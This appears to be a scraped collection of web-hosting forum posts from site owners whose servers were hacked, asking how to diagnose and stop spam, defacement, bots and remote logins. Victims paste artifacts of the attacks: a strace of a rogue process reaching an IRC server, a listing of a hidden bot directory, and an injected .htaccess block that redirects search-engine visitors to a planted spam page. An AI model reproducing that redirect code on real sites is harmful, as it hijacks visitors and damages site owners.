2) This hack spams over 3000 links to google every day, coming from your website, leading to sites that are deemed bad by google. This ruins your page rank and your site, as some of mine have since I missed this latest attack for 2 weeks, will go down the drain.

3) WHen someone googles your website, it will come up with tons of porn links. My daughters site was one of the infected ones... she's 9, and when you look up her site it shows that it goes to porn.

let me know if you've been targeted as well and what we, if anything, can do about it. Servage NEEDS to admit they've been hacked, in fact, the damage to my businesses because of their failure to notify my of these events seems like it should be on their shoulders.

View Replies! View Related

Somebody Hacked My Server ...
I found a process /usr/sbin/httpd was running by nobody, then I did a trace in WHM and found this. Is my server hacked ?

send(4, "@206113irc10quakenet3org1"..., 34, MSG_NOSIGNAL) = 34
poll([{fd=4, events=POLLIN, revents=POLLIN}], 1, 5000) = 1
ioctl(4, FIONREAD, [162]) = 0
recvfrom(4, "@2062012001103irc10quakenet3org1"..., 1024, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("72.36.191.2")}, [16]) = 162
close(4) = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_TCP) = 4
ioctl(4, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbffb3718) = -1 EINVAL (Invalid argument)
_llseek(4, 0, 0xbffb3770, SEEK_CUR) = -1 ESPIPE (Illegal seek)
ioctl(4, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbffb3718) = -1 EINVAL (Invalid argument)
_llseek(4, 0, 0xbffb3770, SEEK_CUR) = -1 ESPIPE (Illegal seek)
fcntl64(4, F_SETFD, FD_CLOEXEC) = 0
connect(4, {sa_family=AF_INET, sin_port=htons(6665), sin_addr=inet_addr("83.140.172.210")}, 16) = -1 ETIMEDOUT (Connection timed out)
close(4) = 0
open("/etc/protocols", O_RDONLY) = 4
fcntl64(4, F_GETFD) = 0
fcntl64(4, F_SETFD, FD_CLOEXEC) = 0

View Replies! View Related

My Server Has Been Hacked
My websites worked very well some days ago. I've touched nothing on my server since then and now every website I have on it is down!

I have a VPS and have root access.

When I restart my apache web server, my websites are working for about 3 seconds! Then it doesn't work any longer!

I've talked to my host but they may find the error if their technicians look at my server but this will cost!

View Replies! View Related

Has My Server Really Been Hacked
I have a dedicated server on a web host. I have 3 domains hosted on the same server. One of the domains was apparently hacked and a rogue script was installed that was using the exim service to send out spam. At least that's what I thought was going on.

When I contacted tech support at the web host they confirmed that the emails were being sent through my server and told me that there was no way for them to tell me what script was doing it or where it was located in the domain files. At this point I had them stop the exim service on my server so I knew no more spam would be sent out until I could get this web space cleaned up.

I backed up all of my files and the database from that domain and wiped out every file in the domain space by having the web host delete everything from their end. Then I created a new web space for the domain. I didn't load any programs or files whatsoever. Just the bare minimum to support the domain. Then I created the email accounts.

During this process I made sure that I changed every password on the domain. I didn't even use the same login names except for the email accounts. The email account passwords were also new.

As soon as I had the email accounts turned on there was more spam. What I find curious is that I have several email accounts on this domain but it's only one that all of this spam is being sent through. I don't know enough about the mechanics to know if this really is being sent through my server or if someone is just plugging in my email address in the spam.

I have not done anything with the other two domains on the server. Is it possible that even though these are saying they are from the fresh domain space they could be from a script on one of the others? ..............

View Replies! View Related

Hacked At OS Level
my VPS has been hacked as per as the provider emailed me

Your VPS is hacked at OS level. It was running following suspicious processes and bot files were uploaded to it.

-bash-3.00# ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 1628 600 ? Ss 19:27 0:00 init boot
root 18326 0.0 0.1 2156 1164 ? Ss 19:27 0:00 bash
root 18354 0.0 0.0 2156 524 ? S 19:27 0:00 bash
root 18356 0.0 0.0 1524 468 ? S 19:27 0:00 sed s/.*ifcfg-venet0://
root 18357 0.0 0.0 1780 100 ? T 19:27 0:00 ls -1 bak/ifcfg-venet0:*
root 18358 0.0 0.0 0 0 ? Z 19:27 0:00 [sed] <defunct>
root 11610 0.0 0.0 1628 296 ? Ss 19:32 0:00 init boot
root 11611 0.0 0.1 2156 1200 ? S 19:32 0:00 /bin/bash /etc/rc.d/rc.sysinit
root 11625 0.0 0.0 1484 572 ? S 19:32 0:00 /sbin/initlog -r /etc/rc.d/rc.sysinit
root 11839 0.0 0.0 1456 276 ? Ss 19:32 0:00 minilogd
root 12006 0.0 0.0 2156 532 ? S 19:32 0:00 /bin/bash /etc/rc.d/rc.sysinit
root 12014 0.0 0.0 1780 104 ? T 19:32 0:00 ls ifcfg-lo ifcfg-venet0
root 12021 0.0 0.0 27104 512 ? S 19:32 0:00 sort -k 1,1 -k 2nroot 12022 0.0 0.0 1372 52 ? T 19:32 0:00 sed s/[0-9]/ &/
root 12025 0.0 0.0 1524 464 ? S 19:32 0:00 sed s/ //
root 12030 0.0 0.0 0 0 ? Z 19:32 0:00 [sed] <defunct>
root 12044 0.0 0.0 0 0 ? Z 19:32 0:00 [sed] <defunct>
root 5654 0.0 0.0 1912 392 ? Ss 22:46 0:00 vzctl: ttyp0
root 5655 0.2 0.1 2156 1248 ttyp0 Ss 22:46 0:00 -bash
root 5733 0.0 0.0 2312 764 ttyp0 R+ 22:46 0:00 ps aux
-bash-3.00# cd /usr/local/games/-bash-3.00# ls -a.
.. irc
-bash-3.00# cd irc/-bash-3.00# ls
1 12 15 18 20 23 26 29 31 34 37 4 42 45 48 50 53 56 59 61 64 8 common mfu.txt
r00t ssh
10 13 16 19 21 24 27 3 32 35 38 40 43 46 49 51 54 57 6 62 68.231.ps.22 9 full pass_file skan x
11 14 17 2 22 25 28 30 33 36 39 41 44 47 5 52 55 58 60 63 7 all go.sh ps ss-bash-3.00

how can I know what is the issue over here

View Replies! View Related

Website Hacked
my site is hacked regularly

today when i checked htaccess file i found

Code:
# a0b4df006e02184c60dbf503e71c87ad
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://([a-z0-9_-]+.)*(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail|gogo|poisk|alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24). [NC]
RewriteCond %{HTTP_REFERER} [?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)=
RewriteCond %{HTTP_REFERER} ![?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)=[^&]+(%3A|%22)
RewriteCond %{TIME_SEC} <59
RewriteRule ^.*$ /admin/editor/filemanager/browser/default/images/ucohex/ex3/t.htm [L]
# a995d2cc661fa72452472e9554b5520c
in it what does this code does.

View Replies! View Related

Cm Software Always Getting Hacked
We use the SnippetMaster content management software on a few of our sites to allow customers to make changes to their websites.

The software requires that the editable web pages be 777 - problem is, they're often getting hacked (usually just the index.html page being replaced with some rubbish about muslims and often involving '3sRaR')

I've not idea how he's doing it and it's happening on more than one server.

Can anyone recommend a way to stop this happening whilst being able to maintain the functionality of the cm software?

View Replies! View Related

Someone Hacked Cpanel
Last night i checked the bandwidth usage on one of my sites, only to find a different last IP in cPanel, the person who did this changed my index page to a page saying it had been hacked, and changed all my moderators/admins ranks to a guest, so that means he has accessed phpMyAdmin too,

Im wondering if anyone knows anything that will help avoid future hacks, and also where i go about getting his ISP to remove his internet connection for hacking, I have a confession from him in email about the hacking, i have banned his IP from cPanel but anyone could change their IP, and i cant exactly ban his entire country from the server

View Replies! View Related

My Server Has Been Hacked
I have Windows 2003, all security patches, I run Plesk 8.2 and nothing much else. I use MySQL as a database with port 3306 open so I can connect from the outside (password protected also). I do use strong passwords on my Plesk, administrator etc. I use standard microsoft FTP, Windows 2003 Firewall and connect through Plesk or remote connection.

Somebody has been able to penetrate to my Admin remote desktop :-( I found strange windows open when I connected and in the log there was an indication of the printer driver load. The printer name was one I don't have and my Remote connection has Printers off. The attacker although smart did connect with his printer and that was visable in log. When he terminated the session I found his IP.

I have since changed my administrator password but it doesn't help, he was in again today. He didn't do any harm up to now I think, I checked for viruses and Spyware.

I don't know what to do any more. He can do whatever he wants and if I don't know how he is getting access to my admin account I can not stop him. I blocked today with IPSec the whole IP range of his provider, but as he is smart he can hack another computer and connect to me from him (maybe he has already done that and the IP was from a hacked server). This is no solution. I need to patch the hole.

I use ASP scripts but I don't think one can gain access to the whole admin by them, maybe only get access to my database (if I would make a mistake and wouldn't protect for the injections or some other things).

I am desperate. Plese, if anybody has some ideas what can I do, how do I "catch" him, I mean patch the hole, please let me know.

I had an idea to block all IP's to port 3389 (Remote desktop) except my IP. But I am a little scared to do that not to lock myself out. And even in that case, if he knows admin password he can get in some other way than using remote desktop,

View Replies! View Related

My Server Just Got Hacked
I'm using windows 2003 Server to host my website.

I was on vacation for 2 weeks so I wasn't able to log onto the server. Nor was there any need to log onto the server as the website was up and running and was fine!

However, when I logged into today, there were extra icons on my desktop.

My server was turned into a spam e-mail remailer. There were applications installed that dissected/generated e-mail addresses.

In my system logs in event viewer, starting from January 30th, there is a whole list of failed log on events where the user tried logging on with different usernames and passwords.

I'm guessing they got into my server by brute force.

I was wondering, does anyone know if windows 2003 automatically logs the IPs of users trying to login remotely and where they are stored?

View Replies! View Related